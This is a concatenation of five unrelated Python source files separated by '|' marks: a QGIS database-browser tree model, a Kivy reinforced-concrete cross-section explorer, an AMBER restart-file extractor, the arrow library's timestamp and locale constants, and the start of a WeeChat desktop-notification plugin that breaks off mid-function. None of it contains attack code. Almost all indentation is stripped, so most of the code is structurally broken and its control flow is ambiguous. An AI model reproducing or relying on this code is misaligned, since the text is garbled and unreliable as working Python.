database.deleted.connect(self.itemDeleted)
schemas = database.schemas()
if schemas is not None:
for s in schemas:
SchemaItem(s, self)
else:
tables = database.tables()
for t in tables:
TableItem(t, self)
self.populated = True
return True
def isConnected(self):
return self.getItemData().database() is not None
# def icon(self):
# return self.connectedIcon if self.isConnected() else self.disconnectedIcon
class SchemaItem(TreeItem):
def __init__(self, schema, parent):
TreeItem.__init__(self, schema, parent)
schema.changed.connect(self.itemChanged)
schema.deleted.connect(self.itemDeleted)
# load (shared) icon with first instance of schema item
if not hasattr(SchemaItem, 'schemaIcon'):
SchemaItem.schemaIcon = QIcon(":/db_manager/icons/namespace.png")
def data(self, column):
if column == 0:
return self.getItemData().name
return None
def icon(self):
return self.schemaIcon
def populate(self):
if self.populated:
return True
for t in self.getItemData().tables():
TableItem(t, self)
self.populated = True
return True
class TableItem(TreeItem):
def __init__(self, table, parent):
TreeItem.__init__(self, table, parent)
table.changed.connect(self.itemChanged)
table.deleted.connect(self.itemDeleted)
self.populate()
# load (shared) icon with first instance of table item
if not hasattr(TableItem, 'tableIcon'):
TableItem.tableIcon = QIcon(":/db_manager/icons/table.png")
TableItem.viewIcon = QIcon(":/db_manager/icons/view.png")
TableItem.viewMaterializedIcon = QIcon(":/db_manager/icons/view_materialized.png")
TableItem.layerPointIcon = QIcon(":/db_manager/icons/layer_point.png")
TableItem.layerLineIcon = QIcon(":/db_manager/icons/layer_line.png")
TableItem.layerPolygonIcon = QIcon(":/db_manager/icons/layer_polygon.png")
TableItem.layerRasterIcon = QIcon(":/db_manager/icons/layer_raster.png")
TableItem.layerUnknownIcon = QIcon(":/db_manager/icons/layer_unknown.png")
def data(self, column):
if column == 0:
return self.getItemData().name
elif column == 1:
if self.getItemData().type == Table.VectorType:
return self.getItemData().geomType
return None
def icon(self):
if self.getItemData().type == Table.VectorType:
geom_type = self.getItemData().geomType
if geom_type is not None:
if geom_type.find('POINT') != -1:
return self.layerPointIcon
elif geom_type.find('LINESTRING') != -1 or geom_type in ('CIRCULARSTRING', 'COMPOUNDCURVE', 'MULTICURVE'):
return self.layerLineIcon
elif geom_type.find('POLYGON') != -1 or geom_type == 'MULTISURFACE':
return self.layerPolygonIcon
return self.layerUnknownIcon
elif self.getItemData().type == Table.RasterType:
return self.layerRasterIcon
if self.getItemData().isView:
if hasattr(self.getItemData(), '_relationType') and self.getItemData()._relationType == 'm':
return self.viewMaterializedIcon
else:
return self.viewIcon
return self.tableIcon
def path(self):
pathList = []
if self.parent():
pathList.extend(self.parent().path())
if self.getItemData().type == Table.VectorType:
pathList.append("%s::%s" % (self.data(0), self.getItemData().geomColumn))
else:
pathList.append(self.data(0))
return pathList
class DBModel(QAbstractItemModel):
importVector = pyqtSignal(QgsVectorLayer, Database, QgsDataSourceUri, QModelIndex)
notPopulated = pyqtSignal(QModelIndex)
def __init__(self, parent=None):
global isImportVectorAvail
QAbstractItemModel.__init__(self, parent)
self.treeView = parent
self.header = [self.tr('Databases')]
if isImportVectorAvail:
self.importVector.connect(self.vectorImport)
self.hasSpatialiteSupport = "spatialite" in supportedDbTypes()
self.hasGPKGSupport = "gpkg" in supportedDbTypes()
self.rootItem = TreeItem(None, None)
for dbtype in supportedDbTypes():
dbpluginclass = createDbPlugin(dbtype)
item = PluginItem(dbpluginclass, self.rootItem)
item.changed.connect(partial(self.refreshItem, item))
def refreshItem(self, item):
if isinstance(item, TreeItem):
# find the index for the tree item using the path
index = self._rPath2Index(item.path())
else:
# find the index for the db item
index = self._rItem2Index(item)
if index.isValid():
self._refreshIndex(index)
else:
qDebug("invalid index")
def _rItem2Index(self, item, parent=None):
if parent is None:
parent = QModelIndex()
if item == self.getItem(parent):
return parent
if not parent.isValid() or parent.internalPointer().populated:
for i in range(self.rowCount(parent)):
index = self.index(i, 0, parent)
index = self._rItem2Index(item, index)
if index.isValid():
return index
return QModelIndex()
def _rPath2Index(self, path, parent=None, n=0):
if parent is None:
parent = QModelIndex()
if path is None or len(path) == 0:
return parent
for i in range(self.rowCount(parent)):
index = self.index(i, 0, parent)
if self._getPath(index)[n] == path[0]:
return self._rPath2Index(path[1:], index, n + 1)
return parent
def getItem(self, index):
if not index.isValid():
return None
return index.internalPointer().getItemData()
def _getPath(self, index):
if not index.isValid():
return None
return index.internalPointer().path()
def columnCount(self, parent):
return 1
def data(self, index, role):
if not index.isValid():
return None
if role == Qt.DecorationRole and index.column() == 0:
icon = index.internalPointer().icon()
if icon:
return icon
if role != Qt.DisplayRole and role != Qt.EditRole:
return None
retval = index.internalPointer().data(index.column())
return retval
def flags(self, index):
global isImportVectorAvail
if not index.isValid():
return Qt.NoItemFlags
flags = Qt.ItemIsEnabled | Qt.ItemIsSelectable
if index.column() == 0:
item = index.internalPointer()
if isinstance(item, SchemaItem) or isinstance(item, TableItem):
flags |= Qt.ItemIsEditable
if isinstance(item, TableItem):
flags |= Qt.ItemIsDragEnabled
# vectors/tables can be dropped on connected databases to be imported
if isImportVectorAvail:
if isinstance(item, ConnectionItem) and item.populated:
flags |= Qt.ItemIsDropEnabled
if isinstance(item, (SchemaItem, TableItem)):
flags |= Qt.ItemIsDropEnabled
# SL/Geopackage db files can be dropped everywhere in the tree
if self.hasSpatialiteSupport or self.hasGPKGSupport:
flags |= Qt.ItemIsDropEnabled
return flags
def headerData(self, section, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole and section < len(self.header):
return self.header[section]
return None
def index(self, row, column, parent):
if not self.hasIndex(row, column, parent):
return QModelIndex()
parentItem = parent.internalPointer() if parent.isValid() else self.rootItem
childItem = parentItem.child(row)
if childItem:
return self.createIndex(row, column, childItem)
return QModelIndex()
def parent(self, index):
if not index.isValid():
return QModelIndex()
childItem = index.internalPointer()
parentItem = childItem.parent()
if parentItem == self.rootItem:
return QModelIndex()
return self.createIndex(parentItem.row(), 0, parentItem)
def rowCount(self, parent):
parentItem = parent.internalPointer() if parent.isValid() else self.rootItem
if not parentItem.populated:
self._refreshIndex(parent, True)
return parentItem.childCount()
def hasChildren(self, parent):
parentItem = parent.internalPointer() if parent.isValid() else self.rootItem
return parentItem.childCount() > 0 or not parentItem.populated
def setData(self, index, value, role):
if role != Qt.EditRole or index.column() != 0:
return False
item = index.internalPointer()
new_value = str(value)
if isinstance(item, SchemaItem) or isinstance(item, TableItem):
obj = item.getItemData()
# rename schema or table or view
if new_value == obj.name:
return False
with OverrideCursor(Qt.WaitCursor):
try:
obj.rename(new_value)
self._onDataChanged(index)
except BaseError as e:
DlgDbError.showError(e, self.treeView)
return False
else:
return True
return False
def removeRows(self, row, count, parent):
self.beginRemoveRows(parent, row, count + row - 1)
item = parent.internalPointer()
for i in range(row, count + row):
item.removeChild(row)
self.endRemoveRows()
def _refreshIndex(self, index, force=False):
with OverrideCursor(Qt.WaitCursor):
try:
item = index.internalPointer() if index.isValid() else self.rootItem
prevPopulated = item.populated
if prevPopulated:
self.removeRows(0, self.rowCount(index), index)
item.populated = False
if prevPopulated or force:
if item.populate():
for child in item.childItems:
child.changed.connect(partial(self.refreshItem, child))
self._onDataChanged(index)
else:
self.notPopulated.emit(index)
except BaseError:
item.populated = False
def _onDataChanged(self, indexFrom, indexTo=None):
if indexTo is None:
indexTo = indexFrom
self.dataChanged.emit(indexFrom, indexTo)
QGIS_URI_MIME = "application/x-vnd.qgis.qgis.uri"
def mimeTypes(self):
return ["text/uri-list", self.QGIS_URI_MIME]
def mimeData(self, indexes):
mimeData = QMimeData()
encodedData = QByteArray()
stream = QDataStream(encodedData, QIODevice.WriteOnly)
for index in indexes:
if not index.isValid():
continue
if not isinstance(index.internalPointer(), TableItem):
continue
table = self.getItem(index)
stream.writeQString(table.mimeUri())
mimeData.setData(self.QGIS_URI_MIME, encodedData)
return mimeData
def dropMimeData(self, data, action, row, column, parent):
global isImportVectorAvail
if action == Qt.IgnoreAction:
return True
# vectors/tables to be imported must be dropped on connected db, schema or table
canImportLayer = isImportVectorAvail and parent.isValid() and \
(isinstance(parent.internalPointer(), (SchemaItem, TableItem)) or
(isinstance(parent.internalPointer(), ConnectionItem) and parent.internalPointer().populated))
added = 0
if data.hasUrls():
for u in data.urls():
filename = u.toLocalFile()
if filename == "":
continue
if self.hasSpatialiteSupport:
from .db_plugins.spatialite.connector import SpatiaLiteDBConnector
if SpatiaLiteDBConnector.isValidDatabase(filename):
# retrieve the SL plugin tree item using its path
index = self._rPath2Index(["spatialite"])
if not index.isValid():
continue
item = index.internalPointer()
conn_name = QFileInfo(filename).fileName()
uri = QgsDataSourceUri()
uri.setDatabase(filename)
item.getItemData().addConnection(conn_name, uri)
item.changed.emit()
added += 1
continue
if canImportLayer:
if QgsRasterLayer.isValidRasterFileName(filename):
layerType = 'raster'
providerKey = 'gdal'
else:
layerType = 'vector'
providerKey = 'ogr'
layerName = QFileInfo(filename).completeBaseName()
if self.importLayer(layerType, providerKey, layerName, filename, parent):
added += 1
if data.hasFormat(self.QGIS_URI_MIME):
for uri in QgsMimeDataUtils.decodeUriList(data):
if canImportLayer:
if self.importLayer(uri.layerType, uri.providerKey, uri.name, uri.uri, parent):
added += 1
return added > 0
def importLayer(self, layerType, providerKey, layerName, uriString, parent):
global isImportVectorAvail
if not isImportVectorAvail:
return False
if layerType == 'raster':
return False # not implemented yet
inLayer = QgsRasterLayer(uriString, layerName, providerKey)
else:
inLayer = QgsVectorLayer(uriString, layerName, providerKey)
if not inLayer.isValid():
# invalid layer
QMessageBox.warning(None, self.tr("Invalid layer"), self.tr("Unable to load the layer {0}").format(inLayer.name()))
return False
# retrieve information about the new table's db and schema
outItem = parent.internalPointer()
outObj = outItem.getItemData()
outDb = outObj.database()
outSchema = None
if isinstance(outItem, SchemaItem):
outSchema = outObj
elif isinstance(outItem, TableItem):
outSchema = outObj.schema()
# toIndex will point to the parent item of the new table
toIndex = parent
if isinstance(toIndex.internalPointer(), TableItem):
toIndex = toIndex.parent()
if inLayer.type() == inLayer.VectorLayer:
# create the output uri
schema = outSchema.name if outDb.schemas() is not None and outSchema is not None else ""
pkCol = geomCol = ""
# default pk and geom field name value
if providerKey in ['postgres', 'spatialite']:
inUri = QgsDataSourceUri(inLayer.source())
pkCol = inUri.keyColumn()
geomCol = inUri.geometryColumn()
outUri = outDb.uri()
outUri.setDataSource(schema, layerName, geomCol, "", pkCol)
self.importVector.emit(inLayer, outDb, outUri, toIndex)
return True
return False
def vectorImport(self, inLayer, outDb, outUri, parent):
global isImportVectorAvail
if not isImportVectorAvail:
return False
try:
from .dlg_import_vector import DlgImportVector
dlg = DlgImportVector(inLayer, outDb, outUri)
QApplication.restoreOverrideCursor()
if dlg.exec_():
self._refreshIndex(parent)
finally:
inLayer.deleteLater()
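# Minimal sketch of wiring the model above to a tree view (assumes a running
# QGIS/Qt environment; not part of the original source):
#
#     from qgis.PyQt.QtWidgets import QTreeView
#     view = QTreeView()
#     view.setModel(DBModel(view))
#     view.expandAll()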
|
'''
Created on 25.08.2016
@author: mkennert
'''
from decimal import Decimal
from kivy.properties import ObjectProperty, NumericProperty, ListProperty
from kivy.uix.gridlayout import GridLayout
from explorer.gui import ExplorerGui
from materialEditor.materiallist import MaterialList
import numpy as np
from ownComponents.design import Design
class Explorer(GridLayout, ExplorerGui):
'''
    the Explorer is the component which shows the stress-strain behaviour
of the selected cross-section-shape
'''
# cross-section-shape
csShape = ObjectProperty()
# layers of the cross-section
layers = ListProperty([])
# bars of the cross-section
bars = ListProperty([])
# height of the cross-section-shape
h = NumericProperty()
# minimum strain
minStrain = NumericProperty(0.5)
# maximum strain
maxStrain = NumericProperty(-0.5)
# minimum stress of the cross section
minStress = NumericProperty()
# maximum stress of the cross section
maxStress = NumericProperty()
# number of integration points
numberIntegration = NumericProperty(100)
# limit of the integration-points
limitIntegration = NumericProperty(1e3)
'''
constructor
'''
def __init__(self, **kwargs):
super(Explorer, self).__init__(**kwargs)
self.cols, self.spacing = 1, Design.spacing
self.graphContent = GridLayout(cols=2)
self.h = self.csShape.ch
self.allMaterial = MaterialList.Instance()
self.create_gui()
'''
update just the cs-properties and the strain-stress-diagram
'''
def update_csShape(self, cs, h, layers, bars):
self.csShape = cs
self.layers = layers
self.bars = bars
self.h = h
'''
update the whole explorer
'''
def update_explorer(self):
self.minStress = self.minStrain
self.maxStress = self.maxStrain
self.calculation(self.minStrain, self.maxStrain, self.numberIntegration)
self.plot()
self.update_graph()
'''
calculate the normal force and the moment
'''
def calculation(self, minStrain, maxStrain, numInt):
# number of reinforcement components
n = len(self.layers) + len(self.bars)
self.y_r = np.zeros(n)
# reinforcement area
self.csArea = np.zeros(n)
self.strain_m, self.stress_m = np.zeros(numInt), np.zeros(numInt)
self.strain_r, self.stress_r = np.zeros(n), np.zeros(n)
# update matrix
self.mlaw = self.allMaterial.allMaterials[3].materialLaw.f
self.y_m = np.linspace(0, self.h, numInt)
self.strain_m = np.interp(
self.y_m, [0, self.h], [minStrain, maxStrain])
self.stress_m = np.array([self.mlaw(strain)
for strain in self.strain_m])
# update all layer-lines
index = 0
for layer in self.layers:
strain = np.interp(layer.y, [0, self.h], [minStrain, maxStrain])
stress = layer.material.materialLaw.f(strain)
self.y_r[index], self.csArea[index] = layer.y, layer.h
self.strain_r[index], self.stress_r[index] = strain, stress
index += 1
# update all bar-lines
for bar in self.bars:
strain = np.interp(bar.y, [0, self.h], [minStrain, maxStrain])
stress = bar.material.materialLaw.f(strain)
self.y_r[index], self.csArea[index] = bar.y, bar.csArea
self.strain_r[index], self.stress_r[index] = strain, stress
index += 1
# calculate the normal force and the moment
stress_y = np.array([s * self.csShape.get_width(s)
for s in self.stress_m])
# normal force
N_m = np.trapz(stress_y, self.y_m)
N_r = np.sum(self.stress_r * self.csArea)
N = N_m + N_r
# moment - matrix
gravity_center = self.csShape._get_gravity_centre()
M_m = np.trapz(stress_y * (self.y_m - gravity_center), self.y_m)
# moment - reinforcement
M_r = np.sum(self.stress_r * self.csArea * (self.y_r - gravity_center))
M = (M_m + M_r)
self.normalForceLbl.text = str('%.2E' % Decimal(str(N)))
self.momentLbl.text = str('%.2E' % Decimal(str(M)))
return N, M, self.strain_m, self.stress_m, self.strain_r, self.stress_r
'''
return the maxStrain of all reinforcement, the y-coordinates and the
minStrain of the concrete
'''
def get_coordinates_upperStrain(self):
        # number of reinforcement components
        n = len(self.layers) + len(self.bars)
        # array to save the y-coordinates of the reinforcement
        y_r = np.zeros(n)
        # minimum strain of the concrete
        eps_cu = self.allMaterial.allMaterials[3].materialLaw.minStrain
        # current infimum
eps_u_r = -1e6
        index = 0
        # find the maximum strain of the materials
        maxStrain = -1e-10
        max_stress = -1e-10
        i = 0
        cnt = 0
for layer in self.layers:
points=layer.material.materialLaw.points
for p in points:
if p[1]>max_stress:
max_stress=p[1]
i=cnt
cnt+=1
            # if the maximum strain is bigger than the current maximum
if maxStrain > eps_u_r:
eps_u_r = points[i][0]
y_r[index] = layer.y
index += 1
        i = 0
        cnt = 0
for bar in self.bars:
points=bar.material.materialLaw.points
for p in points:
if p[1]>max_stress:
max_stress=p[1]
i=cnt
cnt+=1
            # if the maximum strain is bigger than the current maximum
if maxStrain > eps_u_r:
eps_u_r = points[i][0]
y_r[index] = bar.y
index += 1
return eps_u_r, y_r, eps_cu
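# Worked sketch of the section-force integration performed in ``calculation``
# above (illustrative values only, not part of the original source): for a
# rectangular section of constant width b, the normal force is the trapezoidal
# integral of stress(y) * b over the height, and the moment is taken about the
# gravity centre.
#
#     import numpy as np
#     y = np.linspace(0.0, 0.5, 100)                    # section height [m]
#     stress = np.interp(y, [0.0, 0.5], [-10e6, 5e6])   # linear stress profile [Pa]
#     b = 0.2                                           # width [m]
#     N = np.trapz(stress * b, y)                       # normal force [N]
#     M = np.trapz(stress * b * (y - 0.25), y)          # moment about mid-height [Nm]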
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# modificadorRST-AMBER.py
#
# Copyright 2015 Carlos Eduardo Sequeiros Borja <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import sys, restartMaker as rm
from optparse import OptionParser
"""
##############################################################################
# #
# This script just takes an Amber restart file with a protein-funnel #
# complex and extracts only the protein from it. #
# #
##############################################################################
"""
def main():
try:
# We open the restart file to be modified, and put the data in restList
restFile = open(options.inputFile, 'r')
restList = list(restFile)
restFile.close()
# We open the input coordinates file to get the number of atoms of the protein,
# and put the data in refList
refFile = open(options.refFile, 'r')
refList = list(refFile)
refFile.close()
# We get the number of atoms in the protein
numAtmsRef = int(refList[1].split()[0])
# And the atoms from the restart file, only of the protein
atoms = rm.get_atoms(restList, numAtmsRef)
# We generate the protein in an AMBER restart format
protein = rm.generate_prot(atoms)
# And save the protein with the specified name
protFile = open(options.outFile, 'w')
protFile.write(protein)
protFile.close()
except IOError as io:
print "I/O error({0}): {1}".format(io.errno, io.strerror)
parser.print_help()
except TypeError as te:
print str(te) + ' - some argument is missed!!!'
parser.print_help()
except IndexError as ie:
print str(ie) + ' - check your input or ref file!!!'
parser.print_help()
return 0
if __name__ == '__main__':
usage = 'usage: %prog [options] args'
parser = OptionParser(usage)
parser.add_option('-f', '--file', help='Defines the input file that is going to be edited.', action='store', type='string', dest='inputFile')
parser.add_option('-r', '--ref', help='This is the file that contains the desired output number of ATOMS.', action='store', type='string', dest='refFile')
parser.add_option('-o', '--out', help='This is the name for the output file to be generated with the modified number of ATOMS. It is a topology format file. Default outRST.prmtop', action='store', type='string', dest='outFile', default='outRST.prmtop')
(options, args) = parser.parse_args()
main()
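# Example invocation (hypothetical file names, not part of the original
# source):
#
#     python modificadorRST-AMBER.py -f complex.rst -r protein.inpcrd -o protein_only.rst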
|
"""Constants used internally in arrow."""
import sys
from datetime import datetime
if sys.version_info < (3, 8): # pragma: no cover
from typing_extensions import Final
else:
from typing import Final # pragma: no cover
# datetime.max.timestamp() errors on Windows, so we must hardcode
# the highest possible datetime value that can output a timestamp.
# tl;dr platform-independent max timestamps are hard to form
# See: https://stackoverflow.com/q/46133223
try:
# Get max timestamp. Works on POSIX-based systems like Linux and macOS,
# but will trigger an OverflowError, ValueError, or OSError on Windows
_MAX_TIMESTAMP = datetime.max.timestamp()
except (OverflowError, ValueError, OSError): # pragma: no cover
# Fallback for Windows and 32-bit systems if initial max timestamp call fails
# Must get max value of ctime on Windows based on architecture (x32 vs x64)
# https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/ctime-ctime32-ctime64-wctime-wctime32-wctime64
# Note: this may occur on both 32-bit Linux systems (issue #930) along with Windows systems
is_64bits = sys.maxsize > 2 ** 32
_MAX_TIMESTAMP = (
datetime(3000, 1, 1, 23, 59, 59, 999999).timestamp()
if is_64bits
else datetime(2038, 1, 1, 23, 59, 59, 999999).timestamp()
)
MAX_TIMESTAMP: Final[float] = _MAX_TIMESTAMP
MAX_TIMESTAMP_MS: Final[float] = MAX_TIMESTAMP * 1000
MAX_TIMESTAMP_US: Final[float] = MAX_TIMESTAMP * 1_000_000
MAX_ORDINAL: Final[int] = datetime.max.toordinal()
MIN_ORDINAL: Final[int] = 1
DEFAULT_LOCALE: Final[str] = "en-us"
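# Usage sketch (hypothetical helper, not part of the original module): the
# bounds above can be used to range-check a POSIX timestamp before it is
# converted to a datetime.
#
#     def _is_representable_timestamp(ts: float) -> bool:
#         return 0 <= ts <= MAX_TIMESTAMP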
# Supported dehumanize locales
DEHUMANIZE_LOCALES = {
"en",
"en-us",
"en-gb",
"en-au",
"en-be",
"en-jp",
"en-za",
"en-ca",
"en-ph",
"fr",
"fr-fr",
"fr-ca",
"it",
"it-it",
"es",
"es-es",
"el",
"el-gr",
"ja",
"ja-jp",
"sv",
"sv-se",
"zh",
"zh-cn",
"zh-tw",
"zh-hk",
"nl",
"nl-nl",
"af",
"de",
"de-de",
"de-ch",
"de-at",
"nb",
"nb-no",
"nn",
"nn-no",
"pt",
"pt-pt",
"pt-br",
"tl",
"tl-ph",
"vi",
"vi-vn",
"tr",
"tr-tr",
"az",
"az-az",
"da",
"da-dk",
"ml",
"hi",
"fa",
"fa-ir",
"mr",
"ca",
"ca-es",
"ca-ad",
"ca-fr",
"ca-it",
"eo",
"eo-xx",
"bn",
"bn-bd",
"bn-in",
"rm",
"rm-ch",
"ro",
"ro-ro",
"sl",
"sl-si",
"id",
"id-id",
"sw",
"sw-ke",
"sw-tz",
"la",
"la-va",
"lt",
"lt-lt",
"ms",
"ms-my",
"ms-bn",
"or",
"or-in",
}
|
# -*- coding: utf-8 -*-
#
# Project: weechat-notify-send
# Homepage: https://github.com/s3rvac/weechat-notify-send
# Description: Sends highlight and message notifications through notify-send.
# Requires libnotify.
# License: MIT (see below)
#
# Copyright (c) 2015 by Petr Zemek <[email protected]> and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from __future__ import print_function
import os
import re
import subprocess
import sys
import time
# Ensure that we are running under WeeChat.
try:
import weechat
except ImportError:
sys.exit('This script has to run under WeeChat (https://weechat.org/).')
# Name of the script.
SCRIPT_NAME = 'notify_send'
# Author of the script.
SCRIPT_AUTHOR = 's3rvac'
# Version of the script.
SCRIPT_VERSION = '0.9 (dev)'
# License under which the script is distributed.
SCRIPT_LICENSE = 'MIT'
# Description of the script.
SCRIPT_DESC = 'Sends highlight and message notifications through notify-send.'
# Name of a function to be called when the script is unloaded.
SCRIPT_SHUTDOWN_FUNC = ''
# Used character set (utf-8 by default).
SCRIPT_CHARSET = ''
# Script options.
OPTIONS = {
'notify_on_highlights': (
'on',
'Send notifications on highlights.'
),
'notify_on_privmsgs': (
'on',
'Send notifications on private messages.'
),
'notify_on_filtered_messages': (
'off',
        'Also send notifications on filtered (hidden) messages.'
),
'notify_when_away': (
'on',
        'Also send notifications when away.'
),
'notify_for_current_buffer': (
'on',
        'Also send notifications for the currently active buffer.'
),
'notify_on_all_messages_in_buffers': (
'',
'A comma-separated list of buffers for which you want to receive '
'notifications on all messages that appear in them.'
),
'notify_on_all_messages_in_buffers_that_match': (
'',
'A comma-separated list of regex patterns of buffers for which you '
'want to receive notifications on all messages that appear in them.'
),
'notify_on_messages_that_match': (
'',
        'A comma-separated list of regex patterns; a notification is sent '
        'when a message matches any of them.'
),
'min_notification_delay': (
'500',
'A minimal delay between successive notifications from the same '
'buffer (in milliseconds; set to 0 to show all notifications).'
),
'ignore_messages_tagged_with': (
','.join([
'notify_none', # Buffer with line is not added to hotlist
'irc_join', # Joined IRC
'irc_quit', # Quit IRC
'irc_part', # Parted a channel
'irc_status', # Status messages
'irc_nick_back', # A nick is back on server
'irc_401', # No such nick/channel
'irc_402', # No such server
]),
'A comma-separated list of message tags for which no notifications '
'should be shown.'
),
'ignore_buffers': (
'',
'A comma-separated list of buffers from which no notifications should '
'be shown.'
),
'ignore_buffers_starting_with': (
'',
'A comma-separated list of buffer prefixes from which no '
'notifications should be shown.'
),
'ignore_nicks': (
'',
'A comma-separated list of nicks from which no notifications should '
'be shown.'
),
'ignore_nicks_starting_with': (
'',
'A comma-separated list of nick prefixes from which no '
'notifications should be shown.'
),
'hide_messages_in_buffers_that_match': (
'',
'A comma-separated list of regex patterns for names of buffers from '
'which you want to receive notifications without messages.'
),
'nick_separator': (
': ',
'A separator between a nick and a message.'
),
'escape_html': (
'on',
"Escapes the '<', '>', and '&' characters in notification messages."
),
'max_length': (
'72',
'Maximal length of a notification (0 means no limit).'
),
'ellipsis': (
'[..]',
'Ellipsis to be used for notifications that are too long.'
),
'icon': (
'/usr/share/icons/hicolor/32x32/apps/weechat.png',
'Path to an icon to be shown in notifications.'
),
'desktop_entry': (
'weechat',
'Name of the desktop entry for WeeChat.'
),
'timeout': (
'5000',
'Time after which the notification disappears (in milliseconds; '
'set to 0 to disable).'
),
'transient': (
'on',
'When a notification expires or is dismissed, remove it from the '
'notification bar.'
),
'urgency': (
'normal',
'Urgency (low, normal, critical).'
)
}
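# Hedged usage note (added for illustration, not part of the original script): WeeChat
# exposes options read via weechat.config_get_plugin() under the
# "plugins.var.python.notify_send.<option>" namespace, so a user would typically run
# something like:
#
#     /set plugins.var.python.notify_send.notify_on_highlights on
#     /set plugins.var.python.notify_send.ignore_nicks bot1,bot2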
class Notification(object):
"""A representation of a notification."""
def __init__(self, source, message, icon, desktop_entry, timeout, transient, urgency):
self.source = source
self.message = message
self.icon = icon
self.desktop_entry = desktop_entry
self.timeout = timeout
self.transient = transient
self.urgency = urgency
def default_value_of(option):
"""Returns the default value of the given option."""
return OPTIONS[option][0]
def add_default_value_to(description, default_value):
"""Adds the given default value to the given option description."""
# All descriptions end with a period, so do not add another period.
return '{} Default: {}.'.format(
description,
default_value if default_value else '""'
)
def nick_that_sent_message(tags, prefix):
"""Returns a nick that sent the message based on the given data passed to
the callback.
"""
# 'tags' is a comma-separated list of tags that WeeChat passed to the
# callback. It should contain a tag of the following form: nick_XYZ, where
# XYZ is the nick that sent the message.
for tag in tags:
if tag.startswith('nick_'):
return tag[5:]
# There is no nick in the tags, so check the prefix as a fallback.
# 'prefix' (str) is the prefix of the printed line with the message.
# Usually (but not always), it is a nick with an optional mode (e.g. on
# IRC, @ denotes an operator and + denotes a user with voice). We have to
# remove the mode (if any) before returning the nick.
# Strip also a space as some protocols (e.g. Matrix) may start prefixes
# with a space. It probably means that the nick has no mode set.
if prefix.startswith(('~', '&', '@', '%', '+', '-', ' ')):
return prefix[1:]
return prefix
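# Illustrative examples for nick_that_sent_message() (a hedged addition, not part of
# the original script), based purely on the logic above:
#
#     nick_that_sent_message(['irc_privmsg', 'nick_alice'], '@alice')  # -> 'alice'
#     nick_that_sent_message(['irc_privmsg'], '@bob')                  # -> 'bob'   (mode '@' stripped)
#     nick_that_sent_message(['irc_privmsg'], ' carol')                # -> 'carol' (leading space stripped)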
def parse_tags(tags):
"""Parses the given "list" of tags (str) from WeeChat into a list."""
return tags.split(',')
def message_printed_callback(data, buffer, date, tags, is_displayed,
is_highlight, prefix, message):
"""A callback when a message is printed."""
is_displayed = int(is_displayed)
is_highlight = int(is_highlight)
tags = parse_tags(tags)
nick = nick_that_sent_message(tags, prefix)
if notification_should_be_sent(buffer, tags, nick, is_displayed, is_highlight, message):
notification = prepare_notification(buffer, nick, message)
send_notification(notification)
return weechat.WEECHAT_RC_OK
def notification_should_be_sent(buffer, tags, nick, is_displayed, is_highlight, message):
"""Should a notification be sent?"""
if notification_should_be_sent_disregarding_time(buffer, tags, nick,
is_displayed, is_highlight, message):
# The following function should be called only when the notification
# should be sent (it updates the last notification time).
if not is_below_min_notification_delay(buffer):
return True
return False
def notification_should_be_sent_disregarding_time(buffer, tags, nick,
is_displayed, is_highlight, message):
"""Should a notification be sent when not considering time?"""
if not nick:
# A nick is required to form a correct notification source/message.
return False
if i_am_author_of_message(buffer, nick):
return False
if not is_displayed:
if not notify_on_filtered_messages():
return False
if buffer == weechat.current_buffer():
if not notify_for_current_buffer():
return False
if is_away(buffer):
if not notify_when_away():
return False
if ignore_notifications_from_messages_tagged_with(tags):
return False
if ignore_notifications_from_nick(nick):
return False
if ignore_notifications_from_buffer(buffer):
return False
if is_private_message(buffer):
return notify_on_private_messages()
if is_highlight:
return notify_on_highlights()
if notify_on_messages_that_match(message):
return True
if notify_on_all_messages_in_buffer(buffer):
return True
return False
def is_below_min_notification_delay(buffer):
"""Is a notification in the given buffer below the minimal delay between
successive notifications from the same buffer?
When called, this function updates the time of the last notification.
"""
# We store the time of the last notification in a buffer-local variable to
# make it persistent over the lifetime of this script.
LAST_NOTIFICATION_TIME_VAR = 'notify_send_last_notification_time'
last_notification_time = buffer_get_float(
buffer,
'localvar_' + LAST_NOTIFICATION_TIME_VAR
)
min_notification_delay = weechat.config_get_plugin('min_notification_delay')
# min_notification_delay is in milliseconds (str). To compare it with
# last_notification_time (float in seconds), we have to convert it to
# seconds (float).
min_notification_delay = float(min_notification_delay) / 1000
current_time = time.time()
# We have to update the last notification time before returning the result.
buffer_set_float(
buffer,
'localvar_set_' + LAST_NOTIFICATION_TIME_VAR,
current_time
)
return (min_notification_delay > 0 and
current_time - last_notification_time < min_notification_delay)
def buffer_get_float(buffer, property):
"""A variant of weechat.buffer_get_x() for floats.
This variant is needed because WeeChat supports only buffer_get_string()
and buffer_get_int().
"""
value = weechat.buffer_get_string(buffer, property)
return float(value) if value else 0.0
def buffer_set_float(buffer, property, value):
"""A variant of weechat.buffer_set() for floats.
This variant is needed because WeeChat supports only integers and strings.
"""
